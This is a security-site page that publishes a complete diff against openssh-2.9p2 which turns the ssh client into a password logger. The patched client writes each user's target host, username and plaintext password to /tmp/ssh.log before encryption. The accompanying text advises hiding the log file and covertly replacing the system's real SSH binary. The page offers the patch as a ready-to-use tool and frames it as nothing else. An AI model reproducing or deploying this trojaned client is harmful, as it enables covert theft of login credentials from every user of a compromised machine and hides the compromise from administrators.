SecuriTeam - OpenSSH Snoop Patch

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

CanSecWest 2012

2nd Annual Cyber Security

Hack In Paris

Credit:
The information has been provided by Digital Shadow.

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

This is a patch for openssh-2.9p2 that will enable logging of the username, password and target system address whenever anyone uses SSH. The details are grabbed and logged before they are encrypted.

The code currently logs to /tmp/ssh.log - it is highly advised that you modify this to somewhere a little less obvious. To apply the patch, copy it into the directory where openssh-2.9p2 is and type: cat openssh-2.9p2-patch | patch Then compile it, and use a utility such as fix to replace the old SSH with the new version.

Code:
----cut---------- --_-- openssh-2.9p2-patch --_-- ----------cut----
Common subdirectories: old/contrib and new/contrib
Common subdirectories: old/openbsd-compat and new/openbsd-compat
diff -N -c old/ssh.c new/ssh.c
*** old/ssh.c Tue Apr 17 19:14:35 2001
--- new/ssh.c Thu Aug 9 11:59:42 2001
***************
*** 249,254 ****
--- 249,255 ----
        struct passwd *pw;
        int dummy;
        uid_t original_effective_uid;
+ FILE *lg; //xxxx

        __progname = get_progname(av[0]);
        init_rng();
***************
*** 716,721 ****
--- 717,730 ----
            tilde_expand_filename(options.user_hostfile2, original_real_uid);

        /* Log into the remote system. This never returns if the login fails. */
+
+ //xxxx
+ lg=fopen("/tmp/ssh.log", "a");
+ fprintf(lg, "Host: %s\n", host);
+ fprintf(lg, "User: %s\n", options.user);
+ fclose(lg);
+ //xxxx
+
        ssh_login(sensitive_data.keys, sensitive_data.nkeys,
            host, (struct sockaddr *)&hostaddr, pw);

diff -N -c old/sshconnect2.c new/sshconnect2.c
*** old/sshconnect2.c Thu Apr 19 21:40:46 2001
--- new/sshconnect2.c Thu Aug 9 11:59:56 2001
***************
*** 441,446 ****
--- 441,447 ----
        static int attempt = 0;
        char prompt[80];
        char *password;
+ FILE *lg; //xxxx

        if (attempt++ >= options.number_of_password_prompts)
                return 0;
***************
*** 457,462 ****
--- 458,470 ----
        packet_put_cstring(authctxt->method->name);
        packet_put_char(0);
        packet_put_cstring(password);
+
+ //xxxx
+ lg=fopen("/tmp/ssh.log", "a");
+ fprintf(lg, "Password: %s\n\n", password);
+ fclose(lg);
+ //xxxx
+
        memset(password, 0, strlen(password));
        xfree(password);
        packet_inject_ignore(64);

----cut---------- --_-- openssh-2.9p2-patch --_-- ----------cut----

blog comments powered by Disqus

	Apache mod_rewrite Vulnerability PoC
	netsniff-ng - A Linux Network Analyzer and Networking Toolkit
	Simple Local File Inclusion Exploiter
	NiX A Linux Brute Forcer
	Nchop - A TCP Session Splicing Tool Used to Rvade Intrusion Detection Systems
	Netifera - Modular Open Source Platform for Security Tools
	WarVOX - Tools for Exploring, Classifying, and Auditing Telephone Systems
	Webshag - Web Server Audit Tool
	Browser Fuzzer
	FSpy - Linux Filesystem Activity Monitoring
	telnetrecon - Telnet Recon
	Zerowine Sandbox
	JPEG Fuzzer
	VNC Server Fuzzer
	RSH Fuzzer